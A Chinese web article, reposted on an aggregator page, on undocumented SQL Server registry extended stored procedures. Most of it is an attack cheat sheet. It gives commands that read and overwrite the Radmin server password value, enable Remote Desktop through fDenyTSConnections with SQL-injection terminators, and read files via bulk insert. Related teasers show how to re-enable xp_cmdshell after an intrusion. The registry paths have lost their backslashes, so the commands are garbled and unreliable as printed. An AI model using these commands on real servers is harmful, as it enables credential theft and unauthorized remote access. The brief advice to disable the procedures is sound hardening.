SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了, 在SQL server 中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力, 而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们. xp_regenumvalues 以多个记录集方式返回所有键值 使用方法: xp_regenumvalues 注册表根键, 子键 比如说,想看看HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 的所有键值: use master exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionRun' exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters' xp_regread 返回制定键的值 使用方法: xp_regread 根键,子键,键值名 use master exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','CommonFilesDir' exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','Parameter' 得到密码 exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections' 远程桌面开启为0 xp_regwrite 写入注册表 使用方法: xp_regwrite 根键,子键, 值名, 值类型, 值 use master exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestValueName','reg_sz','hello' exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','Parameter','REG_BINARY',0xD7B7CBB4ED8E9EFCE6DCB exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','Parameter','REG_BINARY',0xD7B7CBB4ED8E9EFCE6DCB;-- exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','Parameter','REG_BINARY','';-- 必须清空后再写新数值 修改成功的前提是值为空 注意值类型有2种REG_SZ 表示字符型,相当于新建字符串值,REG_DWORD 表示整型,相当于新建DWORD值 REG_BINARY exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWord',1;-- 禁用远程桌面 xp_regdeletevalue 删除某个值 使用方法: xp_regdeletevalue 根键,子键,值名 exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestValueName' use master exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','Parameter' xp_regdeletekey 删除键,包括该键下所有值 使用方法: use master xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionTestkey' exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters' 运行前提SA 可能用处不是很大,也没深入研究,因为觉得读asp用xp_makecab更方便点,仅供思维扩展。 方法1.bulk insert aaa FROM 'c:1.txt' 方法2.xp_readerrorlog 1,'c:1.txt' 开启远程桌面 master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWord',0;--
推荐整理分享几个扩展存储过程使用方法(储存扩展容量),希望有所帮助,仅作参考,欢迎阅读内容。
![几个扩展存储过程使用方法(储存扩展容量)](https://www.jiuchutong.com/image/20240129/1706495980.jpg)
文章相关热门搜索词:储存扩展容量,存储容量的扩展通常包括哪些,扩展存储过程以什么开头,扩展存储过程,扩展存储过程,储存扩展容量,扩展存储器,扩展存储过程以什么开头,内容如对您有帮助,希望把文章链接给更多的朋友!
SQLServer 数据库同步详细步骤[两台服务器] 为什么要同步SQLServer数据库,它都用在什么场合SQLServer数据库同步配置的原理从0开始一步一步配置SQLServer数据库同步,非常细已经非常熟练,
世界杯猜想活动的各类榜单的SQL语句小结 /*增幅降幅排名*/SelecttopUserName,sum(ReceivePrice)-sum(GuessPrice)asReceivePrice,cast(sum(CASEWHENReceivePrice0THEN1.0ELSE0END)/count(ReceivePrice)*asnumeric(4,1))asRateFrom[game_FantasyLo
SQL入侵恢复xp_cmdshell方法总结 SQL入侵恢复xp_cmdshell方法总结sqlserver下开启xp_cmdshell的办法EXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;SQL开启'OPENRO